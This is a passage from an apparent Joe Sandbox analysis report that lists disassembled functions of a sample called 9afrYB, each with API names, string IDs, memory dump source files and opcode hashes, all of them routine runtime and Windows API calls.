                                                                                  • Instruction Fuzzy Hash: A6519E36B196428ADB148F6DE444A7C7391EB84BD8F188531DB8A4778ADF7DE891C700
                                                                                  Function 00007FF8BFB859C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 3896166516-3733052814
                                                                                  • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                                  • Instruction ID: 20b1b697f5418cec3a029371e4d09cc9900808eff9f2ee617d715b23664045ef
                                                                                  • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                                  • Instruction Fuzzy Hash: 05519F76A083828AEB648F999484B6877A1FBA4BE4F186135DB4D47BC6DF3CE451C700
                                                                                  Function 00007FF8BFB851D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallEncodePointerTranslator
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 3544855599-2084237596
                                                                                  • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                                  • Instruction ID: ce8fee7633e6a6b332893c957c37fe6de7740676abf2ad37f1dadea0abc87c93
                                                                                  • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                                  • Instruction Fuzzy Hash: 29618F32908BC586E7619F59E4407AAB7A0FBC5BD4F045225EB9D07B9ADF7CE190CB00
                                                                                  Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleLoadModuleProc
                                                                                  • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                  • API String ID: 3055805555-3733552308
                                                                                  • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                  • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                                                  • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                  • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                                                  Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentSizeWorking
                                                                                  • String ID: Shrinking process size
                                                                                  • API String ID: 2122760700-652428428
                                                                                  • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                  • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                                                  • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                  • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                                                  Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter$Leave
                                                                                  • String ID:
                                                                                  • API String ID: 2801635615-0
                                                                                  • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                  • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                                                  • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                  • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                                                  Function 00007FF8BFB8E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                  • String ID:
                                                                                  • API String ID: 2718003287-0
                                                                                  • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                  • Instruction ID: d4296e850f2ba1b4a7a6c4b0a277390ed54129c4a6b3b4d8100f290425ac0a4d
                                                                                  • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                  • Instruction Fuzzy Hash: AFD19D32B19A818AE711CFE9D4502EC37A1FB84BD8B548236DF5D97B9ADE38D406C740
                                                                                  Function 00007FF8BFB8ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8BFB8ED07), ref: 00007FF8BFB8EE38
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8BFB8ED07), ref: 00007FF8BFB8EEC3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleErrorLastMode
                                                                                  • String ID:
                                                                                  • API String ID: 953036326-0
                                                                                  • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                  • Instruction ID: 88b8bd0f3f97902236151f001f2e9aa73f6f21c4e255cd7cb7bf29d7137ff379
                                                                                  • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                  • Instruction Fuzzy Hash: 2291A272F1865299F7609FED94802BD2BA4BB84BC8F144139DF4E67A96DF38D486C700
                                                                                  Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                                                  • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                                                  • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEventSection$EnterLeaveReset
                                                                                  • String ID:
                                                                                  • API String ID: 3553466030-0
                                                                                  • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                  • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                                                  • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                  • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                                                  Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEventSection$EnterLeaveReset
                                                                                  • String ID:
                                                                                  • API String ID: 3553466030-0
                                                                                  • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                  • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                                                  • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                  • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                                                  Function 00007FF8BFB82218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID:
                                                                                  • API String ID: 2933794660-0
                                                                                  • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                  • Instruction ID: 4c0ea39d7f90f7ee495843ea0211c00d10b8948a5e7fbb72067e70143d493d4e
                                                                                  • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                  • Instruction Fuzzy Hash: B1111826B15B018AEB00CFA5E8552B833A4FB59798F440E31DB6D86BA4DF78D1A9C340
                                                                                  Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CriticalInitializeSection
                                                                                  • String ID:
                                                                                  • API String ID: 926662266-0
                                                                                  • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                  • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                                                  • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                  • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                                                  Function 00007FF8BFB85C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: __except_validate_context_record
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 1467352782-3733052814
                                                                                  • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                  • Instruction ID: c86fc71962018611d6cefb4ffb2d8d9397bfe1de79caeeb72a8584c3bc590e1a
                                                                                  • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                  • Instruction Fuzzy Hash: EF71C532A0868186DB608FA9D944BBD7BA0FB84BD5F14A135DF8D47A8ADF3CD451CB40
                                                                                  Function 00007FF8BFB86298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 2558813199-1018135373
                                                                                  • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                  • Instruction ID: ab209bacc529aaf9e233797c6ea2b84db9ab4a7fbb5b23731811e30c0945d08f
                                                                                  • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                  • Instruction Fuzzy Hash: 31512D3761974196E620AF99E44026D77A4FB89BD0F184539EB8D07B56CF38E861CB00
                                                                                  Function 00007FF8BFB8EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastWrite
                                                                                  • String ID: U
                                                                                  • API String ID: 442123175-4171548499
                                                                                  • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                  • Instruction ID: 6ccb478a33475241b9abf64205eeb2dc1d173707334973aca2d34b626275bf57
                                                                                  • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                  • Instruction Fuzzy Hash: C8419322B19A8182DB20DFA9E4843AA77A1FB987D4F444131EF8E87799DF3CD441CB40
                                                                                  Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID: csm
                                                                                  • API String ID: 3997070919-1018135373
                                                                                  • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                  • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                                                  • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                  • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                                                  Function 00007FF8BFB90910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF8BFB83A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8BFB83A63
                                                                                  • __GSHandlerCheckCommon.LIBCMT ref: 00007FF8BFB90993
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckCommonHandler__except_validate_context_record
                                                                                  • String ID: csm$f
                                                                                  • API String ID: 1543384424-629598281
                                                                                  • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                  • Instruction ID: 65f29a7a097dfe6a55ada9fd50970016b724cae649142f4c5d5bf7f23b5945d3
                                                                                  • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                  • Instruction Fuzzy Hash: A911B133A1879586EB109FAEE8412AD6764EB85FC4F08C035EF8807B56CE38D861C700
                                                                                  Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimerWaitable
                                                                                  • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                  • API String ID: 1823812067-484248852
                                                                                  • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                  • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                                                  • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                  • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                                                  Function 00007FF8BFB83990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8BFB8112F), ref: 00007FF8BFB839E0
                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8BFB8112F), ref: 00007FF8BFB83A21
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                  • String ID: csm
                                                                                  • API String ID: 2573137834-1018135373
